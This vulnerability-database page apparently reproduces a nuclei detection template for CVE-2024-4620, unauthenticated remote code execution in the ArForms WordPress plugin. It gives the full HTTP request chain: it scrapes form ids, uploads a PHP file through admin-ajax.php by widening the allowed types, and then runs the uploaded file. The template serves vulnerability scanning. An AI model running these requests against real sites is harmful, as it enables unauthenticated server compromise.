Lucene search
K

ArForms < 6.6 - Remote Code Execution

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

ArForms plugin < 6.6 allows remote code execution via file uploads by unauthenticated users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-4620
29 May 202509:42
circl
CNNVD
WordPress plugin ARForms security vulnerability
7 Jun 202400:00
cnnvd
CVE
CVE-2024-4620
7 Jun 202406:00
cve
Cvelist
CVE-2024-4620 ArForms < 6.6 - Unauthenticated RCE
7 Jun 202406:00
cvelist
NVD
CVE-2024-4620
7 Jun 202406:15
nvd
OSV
CVE-2024-4620
7 Jun 202406:15
osv
Patchstack
WordPress ARForms Plugin < 6.6 is vulnerable to Remote Code Execution (RCE)
7 Jun 202400:00
patchstack
Patchstack
WordPress ArForms Premium plugin < 6.6 - Unauthenticated RCE vulnerability
7 Jun 202408:06
patchstack
Positive Technologies
PT-2024-31920
7 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2024-4620
23 May 202507:36
redhatcve
Rows per page
id: CVE-2024-4620

info:
  name: ArForms < 6.6 - Remote Code Execution
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The ARForms - Premium WordPress Form Builder Plugin WordPress plugin before 6.6 allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form
  impact: |
    Unauthenticated attackers can upload malicious PHP files to achieve remote code execution on WordPress servers running ARForms.
  remediation: |
    Update ARForms plugin to version 6.6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4620
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-4620
    epss-score: 0.03345
    epss-percentile: 0.87203
    cpe: cpe:2.3:a:reputeinfosystems:arforms:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: reputeinfosystems
    product: arforms
    framework: wordpress
    verified: true
    max-request: 3
  tags: cve,cve2024,wordpress,wp,wp-plugin,arforms,intrusive,vkev,vuln

flow: http(1) && http(2) && http(3)

variables:
  path: "{{path}}" # page hosting Arform file upload form
  filename: "{{randbase(8)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |
        GET /{{path}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    extractors:
      - type: xpath
        name: field_id
        attribute: id
        internal: true
        xpath:
          - '//div[@class=" arfajax-file-upload"]'

      - type: xpath
        name: form_id
        attribute: value
        internal: true
        xpath:
          - '//input[@data-id="form_id"]'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7y508xYQXqEUtnyQ
        X-FILENAME: {{filename}}.php

        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="action"

        arf_send_form_data
        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="frm"

        {{form_id}}
        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="field_id"

        {{replace(field_id,'div_','')}}
        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="file_type"

        text/html
        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="types_arr"

        htm|html, jpg|jpeg|php
        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="is_preview"


        ------WebKitFormBoundary7y508xYQXqEUtnyQ
        Content-Disposition: form-data; name="files"; filename="tinyjpeg.html"
        Content-Type: text/html

        <?phP echo base64_decode($_GET['input']); ?>
        ------WebKitFormBoundary7y508xYQXqEUtnyQ--

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "|{{filename}}.php|")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/uploads/arforms/userfiles/{{filename}}.php?input={{base64(marker)}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains((body), "{{marker}}")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008adcf5f9251609b4543136fa56d433fe56c2b8f3b972ed9b56d9b4292a65ff69022100e13902257263070e53c981cf1ebfb0597bcc5d8c6a559b9c84605f19de210a27:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.03345
SSVC
16